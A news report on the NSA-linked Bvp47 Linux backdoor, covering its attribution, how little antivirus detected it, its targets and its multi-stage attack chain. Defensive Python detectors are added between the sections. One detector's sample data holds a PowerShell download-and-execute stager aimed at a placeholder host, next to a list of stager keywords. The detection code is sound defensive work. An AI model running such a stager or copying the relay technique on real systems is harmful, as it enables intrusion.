NSA-linked Bvp47 Linux backdoor largely undetected for 10 years

A report published today dives into the technical aspects of a Linux backdoor now identified as Bvp47 that is linked to Equation Group, the Advanced Persistent Threat Actor tied to the US National Security Agency.

Bvp47 has survived until today almost undetected, although it was first submitted to Virus Total’s antivirus database nearly a decade ago in late 2013.

Until this morning, only one antivirus engine on Virus Total detected the Bvp47 sample. As the report spread through the infosec community, detection began to improve, being flagged by six engines at the time of writing.

Bvp47 Linux Backdoor Detection Until Feb 23, 2022
source: BleepingComputer

The Equation Group Connection

The Advanced Cyber Security Research team of Pangu Lab, a Chinese cybersecurity company, claims to have discovered the elusive malware in 2013, during a “forensic investigation of a host in a key national department”.

The Bvp47 sample obtained from the forensic investigation turned out to be an advanced backdoor for Linux with a remote control function protected by the RSA asymmetric cryptography algorithm, which requires a private key to activate.

They found the private key in leaks published by the Shadow Brokers hacker group between 2016 and 2017, which contained hacking tools and zero-day exploits used by the NSA’s cyberattack team, the Equation Group.

Some components of the Shadow Brokers leaks have been integrated into the Bvp47 framework – “dewdrop” and “solutionchar_agents” – indicating that the implant covered Unix-based operating systems such as mainstream Linux distributions, Juniper’s JunOS, FreeBSD and Solaris.

Besides Pangu Lab attributing the Bvp47 malware to the Equation Group, automated analysis of the backdoor also shows similarities to another sample from the same actor.

Kaspersky’s Threat Attribution Engine (KTAE) shows that 34 out of 483 strings matched those in another Equation-related sample for Solaris SPARC systems, which in turn had a 30% similarity with yet another Equation malware sample submitted to Virus Total in 2018 and published by threat researcher Deresz on January 24, 2022.

Correlation of Bvp47 Linux backdoor with other Equation malware
source: Kaspersky

Costin Raiu, Director of the Global Research and Analysis Team at Kaspersky, told BleepingComputer that Bvp47’s code-level similarities match a single sample in the company’s current malware collection.

This indicates that the malware has not been widely used, as is usual for the hacking tools of high-level threat actors, which are reserved for highly targeted attacks.

In the case of the Bvp47 Linux backdoor, Pangu Lab researchers say it has been used on targets in the telecommunications, military, higher education, economics, and science sectors.

They note that the malware affected more than 287 organizations in 45 countries and went largely unnoticed for more than 10 years.

Linux Bvp47 Backdoor Targets
source: Pangu Laboratory

Attack stages

Pangu Lab’s incident analysis involved three servers, one being the target of an external attack and two other internal machines – a mail server and a corporate server.

Bvp47 malware attack
source: Pangu Laboratory

According to the researchers, the threat actor established a connection between the external server and the mail server via a TCP SYN packet carrying a 264-byte payload.
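A bare SYN normally carries no application data, so a SYN with a payload, as the trigger packet described above, is a simple thing to alert on. The following detector is an added example and not code from the article or from Pangu Lab: it parses raw IPv4/TCP packets (no link-layer header), flags any SYN without ACK that carries data, and runs over three constructed sample packets, one of which mimics a 264-byte SYN payload to port 80. The addresses, ports and payload bytes are made up for the demonstration.

```python
import struct
from typing import Dict, List, Optional

TCP_SYN = 0x02
TCP_ACK = 0x10


def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int,
                   flags: int, payload: bytes = b"") -> bytes:
    """Build a minimal IPv4/TCP packet (no link-layer header) for the sample data.
    Checksums are left at zero; the detector never validates them."""
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, 0, 0,
                          (5 << 12) | flags, 65535, 0, 0)
    total_len = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    return ip_hdr + tcp_hdr + payload


def parse_ipv4_tcp(frame: bytes) -> Optional[Dict]:
    """Parse an IPv4/TCP packet into addresses, ports, flags and payload.
    Returns None for anything that is not IPv4/TCP or is truncated."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[2:4])[0]
    if frame[9] != 6 or len(frame) < ihl + 20:
        return None
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", frame[ihl:ihl + 14])
    data_off = (off_flags >> 12) * 4
    return {
        "src": ".".join(str(b) for b in frame[12:16]),
        "dst": ".".join(str(b) for b in frame[16:20]),
        "sport": sport,
        "dport": dport,
        "flags": off_flags & 0x1FF,
        "payload": frame[ihl + data_off:total_len],
    }


def is_syn_with_payload(pkt: Dict) -> bool:
    """A bare SYN (SYN set, ACK clear) carrying data is unusual enough to alert on."""
    flags = pkt["flags"]
    return bool(flags & TCP_SYN) and not (flags & TCP_ACK) and len(pkt["payload"]) > 0


def find_syn_payload_packets(frames: List[bytes]) -> List[Dict]:
    """Return one alert record per bare SYN that carries a payload."""
    hits = []
    for frame in frames:
        pkt = parse_ipv4_tcp(frame)
        if pkt and is_syn_with_payload(pkt):
            hits.append({"src": pkt["src"], "dst": pkt["dst"], "dport": pkt["dport"],
                         "payload_len": len(pkt["payload"])})
    return hits


# Constructed sample traffic (not a real capture): a normal handshake SYN,
# the matching SYN-ACK, and a bare SYN carrying 264 bytes of opaque data to port 80.
SAMPLE_FRAMES = [
    build_ipv4_tcp("10.0.0.7", "10.0.0.5", 50123, 80, TCP_SYN),
    build_ipv4_tcp("10.0.0.5", "10.0.0.7", 80, 50123, TCP_SYN | TCP_ACK),
    build_ipv4_tcp("203.0.113.10", "10.0.0.5", 40000, 80, TCP_SYN,
                   bytes(range(256)) + b"\x00" * 8),
]

if __name__ == "__main__":
    for hit in find_syn_payload_packets(SAMPLE_FRAMES):
        print(f"ALERT bare SYN with {hit['payload_len']}-byte payload "
              f"{hit['src']} -> {hit['dst']}:{hit['dport']}")
```

The check deliberately ignores the payload contents: TCP Fast Open is the one legitimate source of data on a SYN, so in a network that does not use it the flag/length test alone is a low-noise signal, and a 264-byte SYN from an external address to a web port is worth a second look regardless of what the bytes decode to.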

“Around the same time, the [email] server connects to [business] server’s SMB service and performs certain sensitive operations, including connecting to the [business] server with admin account, trying to open terminal services, list directories and run powershell scripts via scheduled tasks” – Pangu Lab

The corporate server then connected to the mail machine to download additional files, “including the Powershell script and the second stage encrypted data”.

An HTTP server was started on one of the two compromised machines, serving two HTML files to the other. One of the files was a base64-encoded PowerShell script that downloads “index.htm”, which contains asymmetrically encrypted data.
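A PowerShell stager hidden in an HTML file as a base64 blob, as described above, can be surfaced by decoding every long base64 run in the page and looking for download-and-execute keywords. The scanner below is an added example, not code from the article or from Pangu Lab; the sample HTML, the stager text and the placeholder host name in it are constructed for the demonstration, and the indicator list is an assumed starting set rather than anything taken from the Bvp47 sample.

```python
import base64
import re
from typing import Dict, List

# A run of base64 text long enough to hold more than a few words.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Strings that commonly appear in PowerShell download-and-execute stagers (assumed set).
INDICATORS = ("Invoke-Expression", "IEX ", "DownloadString", "DownloadFile",
              "Net.WebClient", "New-Object", "FromBase64String", "Invoke-WebRequest")


def decode_candidate(blob: str) -> str:
    """Decode one base64 run and render it as text. UTF-16LE is tried first,
    because that is what powershell -EncodedCommand expects; otherwise UTF-8."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return ""
    # UTF-16LE text made of ASCII characters has a NUL in every second byte.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="ignore")
    return raw.decode("utf-8", errors="ignore")


def find_embedded_powershell(html: str) -> List[Dict]:
    """Return every base64 run in the page whose decoded text contains stager keywords."""
    hits = []
    for m in B64_RUN.finditer(html):
        text = decode_candidate(m.group(0))
        lowered = text.lower()
        matched = [i for i in INDICATORS if i.lower() in lowered]
        if matched:
            hits.append({"offset": m.start(), "indicators": matched, "script": text})
    return hits


# Constructed sample: a stager that fetches "index.htm" from a placeholder host,
# encoded the way -EncodedCommand wants it and dropped into a page as a JS string.
STAGER = ("$c=New-Object Net.WebClient;"
          "IEX $c.DownloadString('http://PLACEHOLDER-HOST/index.htm')")
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_HTML = f"<html><body><script>var p='{ENCODED}';</script></body></html>"

# Constructed benign page: a long base64 run that is just binary data.
BENIGN_HTML = ("<img src='data:image/png;base64,"
               + base64.b64encode(bytes(range(256)) * 2).decode() + "'>")

if __name__ == "__main__":
    for hit in find_embedded_powershell(SAMPLE_HTML):
        print(f"offset {hit['offset']}: {hit['indicators']}")
        print(hit["script"])
    print("benign page hits:", len(find_embedded_powershell(BENIGN_HTML)))
```

The UTF-16 heuristic matters in practice: a blob produced for `-EncodedCommand` decodes to a string full of NUL bytes under UTF-8, and a keyword search on that text would miss every indicator.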

A connection between the two internal machines is used to communicate encrypted data via “its own protocol”, the Pangu Lab researchers explain in their report.

The researchers were able to reconstruct the communication between the servers and summarized it in the following steps, where machine A is the external system and V1/V2 are the mail and corporate server respectively:

  1. Machine A connects to port 80 of server V1 to send a keystroke request and start the backdoor program on server V1
  2. Server V1 connects back to a high port on machine A to establish a data pipeline
  3. Server V2 connects to the backdoor web service opened on server V1 and obtains PowerShell execution from server V1
  4. Server V1 connects to the SMB service port of server V2 to perform command operations
  5. Server V2 establishes a connection with server V1 on a high port and uses its own encryption protocol for data exchange
  6. Server V1 synchronizes the data exchange with machine A, acting as a relay between machine A and server V2
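Seen from a network sensor, the six steps above leave a recognizable sequence of flows: an external host touches an internal web port, that host opens a fresh connection back to the same external address on a high port, then reaches another internal host over SMB, and that second host opens its own high-port channel back to the first. The correlator below is an added example, not code from the article or from Pangu Lab; it reconstructs that chain from flow records (timestamp, source, destination, ports, as a NetFlow or Zeek conn log would provide) and runs over a constructed set of flows. The internal address range, the time window and every address and port in the sample are assumptions.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List


@dataclass(frozen=True)
class Flow:
    ts: float    # seconds since the start of the sample
    src: str
    sport: int
    dst: str
    dport: int


INTERNAL_NETS = [ip_network("10.0.0.0/8")]   # assumed corporate address space


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def correlate_stages(flows: List[Flow], window: float = 600.0) -> List[Dict]:
    """Find the pivot pattern: inbound hit on port 80, reverse high-port connection
    to the same external host, SMB from the pivot to other internal hosts, and
    high-port channels from those hosts back to the pivot, all within `window`."""
    flows = sorted(flows, key=lambda f: f.ts)
    incidents = []
    for hit in flows:
        # Step 1: an external host reaches an internal host's port 80.
        if is_internal(hit.src) or not is_internal(hit.dst) or hit.dport != 80:
            continue
        later = [f for f in flows if hit.ts <= f.ts <= hit.ts + window]
        # Step 2: the contacted host opens a new connection back to that
        # external host on a high port. Ordinary web serving never does this.
        reverse = [f for f in later
                   if f.src == hit.dst and f.dst == hit.src and f.dport >= 1024]
        if not reverse:
            continue
        pivot = hit.dst
        # Step 4: the pivot reaches other internal hosts over SMB (445).
        lateral = sorted({f.dst for f in later
                          if f.src == pivot and f.dport == 445 and is_internal(f.dst)})
        # Step 5: those hosts open a high-port channel back to the pivot.
        channels = sorted({f.src for f in later
                           if f.src in lateral and f.dst == pivot and f.dport >= 1024})
        incidents.append({"external": hit.src, "pivot": pivot,
                          "reverse_port": reverse[0].dport,
                          "lateral_smb": lateral, "data_channels": channels})
    return incidents


# Constructed flow records (not real telemetry). 203.0.113.10 plays machine A,
# 10.0.0.5 is V1 (mail) and 10.0.0.9 is V2 (corporate); the rest is normal noise.
SAMPLE_FLOWS = [
    Flow(0.0, "203.0.113.10", 40000, "10.0.0.5", 80),       # step 1
    Flow(2.0, "10.0.0.5", 38110, "203.0.113.10", 47213),    # step 2
    Flow(10.0, "10.0.0.7", 50123, "93.184.216.34", 443),    # unrelated outbound web
    Flow(30.0, "10.0.0.9", 51234, "10.0.0.5", 80),          # step 3
    Flow(35.0, "10.0.0.5", 38120, "10.0.0.9", 445),         # step 4
    Flow(40.0, "10.0.0.9", 51300, "10.0.0.5", 51000),       # step 5
    Flow(100.0, "198.51.100.4", 52000, "10.0.0.5", 80),     # ordinary external visitor
]

if __name__ == "__main__":
    for inc in correlate_stages(SAMPLE_FLOWS):
        print(inc)
```

The decisive signal is step 2: a server that answers on port 80 and then initiates its own connection to the client's high port is behaving like a client, and that single reversal is what the rest of the chain hangs on. Tuning the window and the SMB port list to the environment keeps the correlator useful beyond this one sample.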

Based on the communication scheme between the three servers described above, the researchers assess that the backdoor is the creation of “an organization with strong technical capabilities”.
